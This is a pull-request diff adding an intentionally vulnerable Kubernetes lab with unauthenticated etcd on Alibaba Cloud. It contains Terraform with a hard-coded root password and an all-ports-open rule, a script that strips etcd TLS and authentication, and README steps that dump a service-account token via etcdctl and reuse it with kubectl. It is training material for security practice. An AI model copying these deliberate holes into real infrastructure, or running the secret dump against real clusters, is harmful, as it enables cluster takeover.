Merge pull request #86 from leveryd/main
feat: add kubernets etcd unauth scenario
Showing
8 changed files
with
312 additions
and
0 deletions.
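--- /dev/null
+++ b/README.md
@@ -0,0 +1,77 @@
+# kubernetes etcd unauth Vulnerable Environment
+
+English | [中文](./README_CN.md)
+
+## Description
+
+This is a scenario used to build the kubernetes etcd unauth vulnerability environment.
+
+After building the environment with Terraform, users can obtain api object resource on kubernetes cluster through the etcd unauth vulnerabilities.
+
+## Deployment Environment
+
+Execute the following command in the container
+
+```shell
+cd /TerraformGoat/kubernets/etcd/unauth
+```
+
+Configure Alibaba Cloud Access Credentials
+
+```shell
+export ALICLOUD_ACCESS_KEY="LTAI5tFkmNGXXXXXXXXX"
+export ALICLOUD_SECRET_KEY="ORBs2lulAHDXXXXXXXXX"
+export ALICLOUD_REGION="cn-beijing"
+```
+
+> You can create and view your AccessKey on the [AccessKey page](https://ram.console.aliyun.com/manage/ak) of the Alibaba Cloud console
+Deploy Vulnerable Environment
+
+```shell
+terraform init
+terraform apply
+```
+
+> When the terminal prompts `Enter a value:`, enter `yes`
+![img](../../../images/20220622-174141.jpg)
+
+After the environment is set up, You can see the etcd access address of the scenario at Outputs.
+
+## Vulnerability Utilization
+
+we can use "etcdctl" tool to read secrets on kubernets cluster.
+
+for example, get "deployment controller" token
+
+```shell
+➜ unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get / --prefix --keys-only|grep secrets
+...
+/registry/secrets/kube-system/deployment-controller-token-klbtj
+...
+➜ unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get /registry/secrets/kube-system/deployment-controller-token-klbtj
+...
+token�eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.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.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA#kubernetes.io/service-account-token
+```
+
+then use "deployment controller" token to access kube-apiserver, such as query pod resources
+
+```shell
+➜ unauth git:(main) ✗ kubectl --insecure-skip-tls-verify=true --server="https://39.96.163.182:6443" --token="eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.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.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0
+GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA" get pods -A
+
+NAMESPACE NAME READY STATUS RESTARTS AGE
+kube-system coredns-5495dd7c88-kb7vh 0/1 Pending 0 18m
+kube-system coredns-5495dd7c88-lwkpr 0/1 Pending 0 18m
+kube-system kube-apiserver-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 0 17m
+kube-system kube-controller-manager-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 1 19m
+kube-system kube-proxy-pgrtj 1/1 Running 0 18m
+kube-system kube-scheduler-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 1 19m
+```
+
+## Destroy the environment
+
+```shell
+terraform destroy
+```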
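--- /dev/null
+++ b/README_CN.md
@@ -0,0 +1,77 @@
+# kubernetes etcd 漏洞环境
+
+[English](./README.md) | 中文
+
+## 描述信息
+
+这是一个用于构建kubernetes etcd组件 未授权访问漏洞环境的靶场。
+
+使用 terraform 构建环境后,用户可以通过 etcd组件 未授权访问漏洞获取到 kubernetes中的api资源信息。
+
+## 环境搭建
+
+在容器中执行以下命令
+
+```shell
+cd /TerraformGoat/kubernets/etcd/unauth
+```
+
+配置阿里云访问凭证
+
+```shell
+export ALICLOUD_ACCESS_KEY="LTAI5tFkmNGXXXXXXXXX"
+export ALICLOUD_SECRET_KEY="ORBs2lulAHDXXXXXXXXX"
+export ALICLOUD_REGION="cn-beijing"
+```
+
+> 在阿里云控制台的 [AccessKey 页面](https://ram.console.aliyun.com/manage/ak) 可以创建和查看您的 AccessKey
+部署靶场
+
+```shell
+terraform init
+terraform apply
+```
+
+> 在终端提示 `Enter a value:` 时,输入 `yes` 即可
+![img](../../../images/20220622-174141.jpg)
+
+环境搭建完后,在 Outputs 处可以看到etcd的访问地址。
+
+## 漏洞利用
+
+在存在 未授权访问 漏洞的 etcd 上,我们可以利用 etcdctl工具 读取 kubernetes集群 的secrets数据。
+
+读取secrets数据,获取部署控制器token
+
+```shell
+➜ unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get / --prefix --keys-only|grep secrets
+...
+/registry/secrets/kube-system/deployment-controller-token-klbtj
+...
+➜ unauth git:(main) ✗ etcdctl --endpoints="http://39.96.163.182:2379" get /registry/secrets/kube-system/deployment-controller-token-klbtj
+...
+token�eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.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.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA#kubernetes.io/service-account-token
+```
+
+利用token访问访问kube-apiserver,比如查询pod
+
+```shell
+➜ unauth git:(main) ✗ kubectl --insecure-skip-tls-verify=true --server="https://39.96.163.182:6443" --token="eyJhbGciOiJSUzI1NiIsImtpZCI6Im93R3VfUk1vcHRpakg3T2xZVkNuODVIYTg3eXlzYWprYU1ub2hWSUhSNXcifQ.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.oUUcnRPq1Rc3HttQsS3HBarzmAfIZk4YrmmJ0ARjYG2LwIp_hQbVQBZ0crKdsL10nXjV9MmLIPB9jFxVmUHhifc054cQ5H0e5yKQv7rlQxbNSIZo2s9nYgMql5DrEaQ9aocyzGlZVG8Z5aWFHEjduPCQKeCvBoQfuTyBrqBAqZP-zWYYIFLrYxKOyFICqDTNe0
+GKA3MxXeMrpp2S1ijg29WflZ_fTXJbY6iVISnT9oUFuw6uoIatYvNZXIsCfXqwAN4TPmEX4_joezLCKQH9iUCGutHpiyTXJpd3Ry8x66ziVu9JFzoOjpHJCyOmo-hT-eV5TD6UBxeg9UEQzZqwTA" get pods -A
+
+NAMESPACE NAME READY STATUS RESTARTS AGE
+kube-system coredns-5495dd7c88-kb7vh 0/1 Pending 0 18m
+kube-system coredns-5495dd7c88-lwkpr 0/1 Pending 0 18m
+kube-system kube-apiserver-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 0 17m
+kube-system kube-controller-manager-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 1 19m
+kube-system kube-proxy-pgrtj 1/1 Running 0 18m
+kube-system kube-scheduler-iz2zeh6di9zn4ff2qvgh8jz 1/1 Running 1 19m
+```
+
+## 销毁环境
+
+```shell
+terraform destroy
+```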
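--- /dev/null
+++ b/[terraform file, path not shown on page]
@@ -0,0 +1,82 @@
+resource "alicloud_instance" "instance" {
+security_groups = alicloud_security_group.group.*.id
+instance_type = data.alicloud_instance_types.types_ds.instance_types.0.id
+image_id = "ubuntu_18_04_64_20G_alibase_20190624.vhd"
+instance_name = "huocorp_terraform_goat_instance"
+vswitch_id = alicloud_vswitch.vswitch.id
+system_disk_size = 20
+internet_max_bandwidth_out = 100
+password = "Huoxian@123" // 虚拟机密码
+
+provisioner "file" {
+connection {
+type = "ssh"
+host = self.public_ip
+user = "root"
+password = "Huoxian@123"
+timeout = "1h"
+}
+
+source = "resource/kk"
+destination = "/root/kk" // deploy_k8s.sh用来安装k8s
+}
+
+provisioner "remote-exec" {
+connection {
+type = "ssh"
+host = self.public_ip
+user = "root"
+password = "Huoxian@123"
+timeout = "1h"
+}
+script = "resource/deploy_k8s.sh"
+}
+
+depends_on = [
+alicloud_security_group.group,
+alicloud_vswitch.vswitch,
+]
+}
+
+resource "alicloud_security_group" "group" {
+name = "huocorp_terraform_goat_security_group"
+vpc_id = alicloud_vpc.vpc.id
+depends_on = [
+alicloud_vpc.vpc
+]
+}
+
+resource "alicloud_security_group_rule" "allow_all_tcp" {
+type = "ingress"
+ip_protocol = "tcp"
+nic_type = "intranet"
+policy = "accept"
+port_range = "1/65535" // 允许访问所有端口
+priority = 1
+security_group_id = alicloud_security_group.group.id
+cidr_ip = "0.0.0.0/0"
+depends_on = [
+alicloud_security_group.group
+]
+}
+
+resource "alicloud_vpc" "vpc" {
+vpc_name = "huocorp_terraform_goat_vpc"
+cidr_block = "172.16.0.0/16"
+}
+
+resource "alicloud_vswitch" "vswitch" {
+vpc_id = alicloud_vpc.vpc.id
+cidr_block = "172.16.0.0/24"
+zone_id = "cn-beijing-h"
+vswitch_name = "huocorp_terraform_goat_vswitch"
+depends_on = [
+alicloud_vpc.vpc
+]
+}
+
+// kubekey安装k8s集群,配置要求至少 2核4g
+data "alicloud_instance_types" "types_ds" {
+cpu_core_count = 2
+memory_size = 4
+}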
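Review bot: The `allow_all_tcp` rule (`port_range = "1/65535"`, `cidr_ip = "0.0.0.0/0"`) opens every TCP port on the instance to the internet, while the scenario only needs etcd on 2379 (and, for the README's kubectl step, the apiserver on 6443), so the root SSH login whose password is hard-coded as `password = "Huoxian@123"` on lines 236, 244 and 259 is also reachable from anywhere. Narrowing it, e.g. `port_range = "2379/2379"` plus a second rule for 6443, keeps the lab reproducible without the incidental exposure; if the wide rule is deliberate, the comment on line 287 should say why. The same password is repeated three times; a single `variable "instance_password"` (marked `sensitive = true` where the Terraform version in use supports it) would keep it in one place and out of plan output. The comments on lines 236, 250, 287 and 314 are in Chinese; English equivalents (`// VM root password`, `// deploy_k8s.sh installs k8s with kubekey`, `// allow all ports`, `// kubekey needs at least 2 cores / 4 GB`) would help other readers.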
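--- /dev/null
+++ b/[terraform outputs file, path not shown on page]
@@ -0,0 +1,4 @@
+output "etcd_unauth_lab_address_link" {
+value = "http://${alicloud_instance.instance.public_ip}:2379"
+description = "etcd un-auth lab address link."
+}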
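--- /dev/null
+++ b/resource/deploy_k8s.sh
@@ -0,0 +1,59 @@
+#!/bin/bash
+function deploy_k8s(){
+export KKZONE=cn
+
+# /root/kk 已经通过terrraform provisioner拷贝主机
+chmod 755 /root/kk
+
+apt-get update -y
+apt-get install -y conntrack ebtables socat
+
+/root/kk create cluster --with-kubernetes v1.21.5 -y
+}
+
+# etcd没有任何身份认证
+function deploy_vuln_etcd1(){
+# 备份
+apiserver_config_path=/etc/kubernetes/manifests/kube-apiserver.yaml
+etcd_config_path=/etc/etcd.env
+command_path=/usr/local/bin/etcd
+
+cp $apiserver_config_path /root/kube-apiserver.yaml
+cp $etcd_config_path /root/etcd.env
+
+# 删除tls配置
+sed -i '/ETCD_TRUSTED_CA_FILE/d' $etcd_config_path
+sed -i '/ETCD_CERT_FILE/d' $etcd_config_path
+sed -i '/ETCD_KEY_FILE/d' $etcd_config_path
+sed -i '/ETCD_CLIENT_CERT_AUTH/d' $etcd_config_path
+
+# 修改https到http
+# 执行两次,因为 ETCD_LISTEN_CLIENT_URLS=https://172.31.14.33:2379,https://127.0.0.1:2379
+sed -i 's/\(.*\)https:\(.*\):2379/\1http:\2:2379/' $etcd_config_path
+sed -i 's/\(.*\)https:\(.*\):2379/\1http:\2:2379/' $etcd_config_path
+
+echo "[done] '$etcd_config_path' change"
+
+# 重新启动etcd进程
+export $(cat $etcd_config_path | grep -v '#' | xargs)
+
+# echo "$command_path"
+pkill -f "$command_path"
+sleep 1
+ps aux| grep "$command_path"
+setsid $command_path &
+
+echo "[done] 'etcd' restart"
+
+# 修改配置,重新启动apiserver进程
+sed -i '/--etcd-cafile/d' $apiserver_config_path
+sed -i '/--etcd-certfile/d' $apiserver_config_path
+sed -i '/--etcd-keyfile/d' $apiserver_config_path
+sed -i 's/\(.*\)--etcd-servers=https:\(.*\):2379/\1--etcd-servers=http:\2:2379/' $apiserver_config_path
+
+echo "[done] '$apiserver_config_path' change"
+}
+
+deploy_k8s
+echo "[done] 'k8s cluster' deploy" && sleep 60
+deploy_vuln_etcd1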
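Review bot: `export $(cat $etcd_config_path | grep -v '#' | xargs)` on line 379 drops every line that contains a `#` anywhere (not only comment lines) and word-splits what remains, so any setting whose value holds a space, `#` or quotes is silently lost or exported wrong just before etcd is relaunched; `set -a; . "$etcd_config_path"; set +a` loads the file the way the shell itself would. The script sets no `set -euo pipefail`, so a failed `cp`/`sed`/`pkill` still falls through to `setsid $command_path &` on line 386, and the bare `$apiserver_config_path`, `$etcd_config_path` and `$command_path` expansions should be double-quoted throughout. The two identical `sed` calls on lines 371/372 assume exactly two `https:` client URLs in the file; one `sed -i 's#https:\([^,]*\):2379#http:\1:2379#g' "$etcd_config_path"` handles any count. It is not visible from the script whether etcd is still under a service manager after `pkill`; if it is, the supervised instance may be restarted next to the `setsid` copy and contend for port 2379, which deserves either an explicit stop of the unit or a comment stating why it cannot happen.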
Binary file not shown.
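--- /dev/null
+++ b/[terraform provider file, path not shown on page]
@@ -0,0 +1,13 @@
+terraform {
+required_providers {
+alicloud = {
+source = "aliyun/alicloud"
+version = "1.163.0"
+}
+}
+}
+
+provider "alicloud" {
+profile = "default"
+region = "cn-beijing"
+}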